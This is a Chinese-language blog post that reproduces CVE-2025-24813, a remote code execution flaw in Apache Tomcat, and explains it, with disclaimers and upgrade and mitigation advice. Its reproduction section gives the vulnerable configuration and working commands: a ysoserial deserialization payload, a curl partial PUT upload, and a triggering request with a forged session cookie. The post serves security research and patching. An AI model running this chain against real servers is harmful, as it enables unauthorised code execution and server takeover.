CVE-2025-24813 RCE复现

最新推荐文章于 2025-04-06 09:00:00 发布
最新推荐文章于 2025-04-06 09:00:00 发布
阅读量2.9k 收藏 16
点赞数 25
文章标签: apache tomcat java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42773448/article/details/146199296
版权

Apache Tomcat 远程代码执行漏洞

⚠️ **免责声明**
本文目标读者为安全研究人员与运维人员,任何利用本文内容进行非法攻击的行为均与作者无关。

1. 漏洞描述

Apache Tomcat 在特定配置下存在反序列化漏洞。攻击者可通过构造恶意请求,利用文件会话持久化机制将恶意序列化数据写入服务器,并在后续请求中触发反序列化操作,从而导致远程代码执行。

2. 影响范围

9.0.0.M1 <= Apache Tomcat <= 9.0.98

10.1.0-M1 <= Apache Tomcat <= 10.1.34

11.0.0-M1 <= Apache Tomcat <= 11.0.2

3. 漏洞触发条件

1、DefaultServlet 写入功能启用:需在 web.xml 中配置 readonly=false

2、Partial PUT 请求支持:Tomcat 默认支持分块上传。

3、文件会话持久化启用:需在 context.xml 中配置 PersistentManagerFileStore

4、存在反序列化利用链:类路径下需包含存在漏洞的库(如commons-collections-3.2.1.jar)。

4. 漏洞原理

1、Tomcat 文件会话持久化:Tomcat 支持将 HTTP 会话数据持久化到文件系统中,默认存储路径为 $CATALINA_BASE/work/Catalina/localhost/ROOT

2、DefaultServlet 写入功能:Tomcat 的 DefaultServlet 默认支持文件上传功能,但写入功能默认关闭。

3、Partial PUT 请求:Tomcat 支持分块上传文件(Partial PUT),允许客户端通过 Content-Range 头部分上传文件。

4.1 漏洞利用流程

1、上传恶意序列化数据

攻击者通过 Partial PUT 请求将恶意序列化数据写入 Tomcat 的工作目录。

文件路径中的 / 被转换为 .,例如 /evil/session 被存储为 .evil.session。

2、触发反序列化

攻击者通过设置 JSESSIONID=.evil,诱导 Tomcat 加载恶意会话文件。

Tomcat 在加载会话文件时触发反序列化操作,执行恶意代码。

4.2 漏洞核心问题

  • 文件名处理缺陷:Tomcat 在处理 Partial PUT 请求时,未对文件名进行严格校验,导致攻击者可通过路径穿越写入恶意文件。
  • 反序列化未校验:Tomcat 在加载会话文件时未对反序列化数据进行校验,导致恶意代码执行。

5. 漏洞复现

5.1 环境搭建

1、安装受影响版本的 Tomcat(如 9.0.98)。

2、配置 context.xml 

<Context>
    <Manager className="org.apache.catalina.session.PersistentManager">
        <Store className="org.apache.catalina.session.FileStore"/>
    </Manager>
</Context>

3、配置 web.xml:

<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
</servlet>

4、添加漏洞库:将 commons-collections-3.2.1.jar 放入 lib 目录。

5.2 复现步骤

1、生成恶意序列化数据

java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" > payload.ser

2、上传恶意文件

curl -X PUT -H "Content-Range: bytes 0-999/1200" --data-binary @payload.ser http://target:8080/evil/session

3、触发漏洞

curl -H "Cookie: JSESSIONID=.evil" http://target:8080/

4、验证漏洞

6. 潜在危害

远程代码执行:攻击者可利用漏洞在目标服务器上执行任意命令。

数据泄露:攻击者可读取服务器上的敏感文件。

服务器控制:攻击者可完全控制受影响的服务器。

7. 修复建议

7.1 官方修复

Apache 官方已发布安全通告并发布了修复版本,请尽快下载安全版本修复漏洞。

Upgrade to Apache Tomcat 11.0.3 or later

Upgrade to Apache Tomcat 10.1.35 or later

Upgrade to Apache Tomcat 9.0.99 or late

7.2 临时缓解措施

1、禁用 DefaultServlet 写入功能:在 web.xml 中确保 readonly=true。
2、禁用文件会话持久化:移除 context.xml 中的 PersistentManager 配置。
3、移除漏洞库:删除或更新类路径下存在漏洞的库(如commons-collections-3.2.1.jar)。

8. 总结

该漏洞利用条件较为复杂,但一旦满足条件,攻击者可实现远程代码执行,危害极大。建议受影响的用户及时采取修复措施,避免被攻击者利用。

参考链接

https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq

⚠️本文仅用于教育和安全研究目的。对本文描述的技术的任何滥用行为,作者不承担任何责任。

[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)
qq_51577576的博客
12-07 699
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE) Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。
【漏洞复现Apache Tomcat 远程代码执行(CVE-2025-24813
李火火的安全圈
03-28 299
Apache Tomcat 是一个开源的、轻量级的 Java Servlet 容器和 Web 服务器,由Apache软件基金会开发和维护,支持运行 Java Servlet、JavaServer Pages (JSP) 和其他基于 Java 的 Web 应用程序,广泛用于开发和部署企业级 Web 应用。
Tomcat Session 反序列化漏洞(CVE-2025-24813
玄道的网安博客
03-14 1296
核心逻辑在这里,以 range.length作为文件的长度,range.start作为起始点开始处理流,这也是为什么 length 必须要大于 body 的总长度,不然无法将内容完全上传。这部分是反序列化触发点,CVE-2020-9484出自这里,所以不难看出这其实是一个组合漏洞,当时CVE-2020-9484是因为存在目录穿越问题所以可以穿越加载一个自定义的序列化文件。CVE-2017-12615、CVE-2024-50379均涉及该方法,也就是 doPUT,其实逻辑很简单,如以下代码。
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813) 超详细!
欢迎来到我的博客,这里是我分享Python开发心得与信息安全探索的乐园。作为一名热衷于编程与安全的技术爱好者,我始终致力于在Python的世界里深耕细作,探索其强大的功能与无限的可能性。同时,信息安全也是我关注的重点,我深知在这个数字化时代,保护数据安全的
03-14 5722
远程代码执行漏洞(CVE-2025-24813)源于 Apache Tomcat 的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。‌将 Apache Tomcat 升级至安全版本(Tomcat 11.0.2+、10.1.34+、9.0.98+),以修复反序列化漏洞及 PUT 请求处理缺陷‌。
漏洞预警 | Apache Tomcat 存在远程代码执行漏洞(CVE-2025-24813
C20220511的博客
03-14 482
Apache Tomcat 是一个Apache软件基金会属下Jakarta项目开发的开源的、轻量级的 Java Web 服务器 ,主要用于运行基于 Java Servlet 和 JavaServer Pages (JSP) 开发的 Web 应用程序,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。3、应用程序使用了 Tomcat 的基于文件的会话持久化功能,并采用默认的存储位置;③升级到 Apache Tomcat 9.0.99 或更高版本。
Goby 漏洞安全通告| Apache Tomcat 远程命令执行(CVE-2025-24813)
m0_46699477的博客
03-12 2001
Apache Tomcat 是一个开源的 Java Servlet 容器,广泛用于运行基于 Java 的 Web 应用程序。该漏洞(CVE-2025-24813)允许远程攻击者通过特定的恶意请求在目标系统上执行任意命令,从而完全控制受影响的服务器。 满足以下条件,攻击者可以远程代码执行(RCE): 1. DefaultServlet 启用了写入权限(默认情况下禁用)。 2. 服务器启用了partial PUT(默认启用)。 3. Tomcat 使用了基于文件的 Session 持久化机制(非默认配置,默认为
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)修复方案
拉丁解牛技术专栏
03-11 1324
它实现了Java Servlet和JavaServer Pages (JSP) 技术,提供了一个运行环境来处理HTTP请求、生成动态网页,并支持WebSocket通信。,当应用程序启用servlet写入功能(默认情况下禁用)、使用 Tomcat默认会话持久机制和存储位置、依赖库存在反序列化利用链时,未授权攻击者能够执行恶意代码获取服务器权限。近日,2025年3月11日,奇安信 CERT发布安全风险通告,奇安信CERT监测到官方修复。
图片服务器
whinsist的专栏
07-05 307
1.图片服务器源码 2.图片服务器tomcat配置(tomcat/config/web.xml)         default         org.apache.catalina.servlets.DefaultServlet                     debug             0
CVE-2025-24813 漏洞全解析|Apache Tomcat 关键路径绕过与RCE
最新发布
syg6921008的博客
04-06 2389
Apache Tomcat 中一个关键的路径等效性(Path Equivalence)漏洞,允许未经身份验证的远程攻击者在特定配置下实现远程代码执行(RCE)、读取敏感文件,甚至篡改文件内容。该漏洞已在野外被观察到存在实际利用行为,影响范围广泛。CVE-2025-24813 是一次典型的“路径+反序列化+配置缺陷”复合型漏洞,表面上源于文件路径处理缺陷,实际利用则依赖于多个错误配置的叠加效应。边界可信假设失效、中间件权限设置失误、反序列化引擎暴露等老问题,在现代系统中依旧构成致命威胁。
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
CVE-2019-18935:RCE漏洞用于ASP.NET AJAX的Telerik UI中的.NET JSON反序列化漏洞
05-25
CVE-2019-18935 Telerik UI中用于ASP.NET AJAX的.NET JSON反序列化漏洞的概念验证漏洞,允许远程执行代码。 描述 是用于Web应用程序的UI组件的广泛使用的套件。 它以不安全的方式反序列化JSON对象,从而导致在软件...
CVE-2025-1094: 通过 WebSocket 的 SQL 注入到 RCE
weixin_47075747的博客
02-27 498
该漏洞利用 PostgreSQL 中的 SQL 注入漏洞,注入恶意代码读取敏感文件(如),并将其存储在易受攻击的服务器上。然后,利用活动的 WebSocket 连接劫持,执行任意命令,最终在被攻陷的服务器上实现远程 shell。
Tomcat RCECVE-2025-24813复现
Neolock的博客
03-21 1449
它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。这里需要注意Content-Range的分块值需要与Content-Length保持一致,且大于当前文件的长度。我们都知道tomcatJava语言开发的,所以需要JAVA环境,我这里的Java环境是1.8.0_441。当文件被上传成功后,大概30s之内payload会被自动触发,随之文件会被清除。
【漏洞处置SOP】Apache Tomcat远程代码执行漏洞(CVE-2025-24813)处置建议
weixin_43727442的博客
03-14 241
安全漏洞防治中心团队成员编制了升级到安全版本的标准作业程序(SOP),将 Apache Tomcat 9.0.98 升级到安全版本 9.0.102,已完成验证。
【安全漏洞】CVE-2025-24813
宣晨光
03-12 935
Apache Tomcat远程代码执行漏洞(CVE-2025-24813)是一个严重的安全问题,它允许攻击者在特定条件下上传恶意Session文件并执行远程代码。以下是关于此漏洞的详细信息和建议的应对措施。
Apache Tomcat RCE漏洞复现CVE-2025-24813
weixin_55010563的博客
03-15 933
使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录work\Catalina\localhost\ROOT。尝试使用 Tomcat 9.0.98 版本复现:https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.zip。
Spring Boot Tomcat 漏洞修复
Gjw_java的博客
03-13 2067
Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值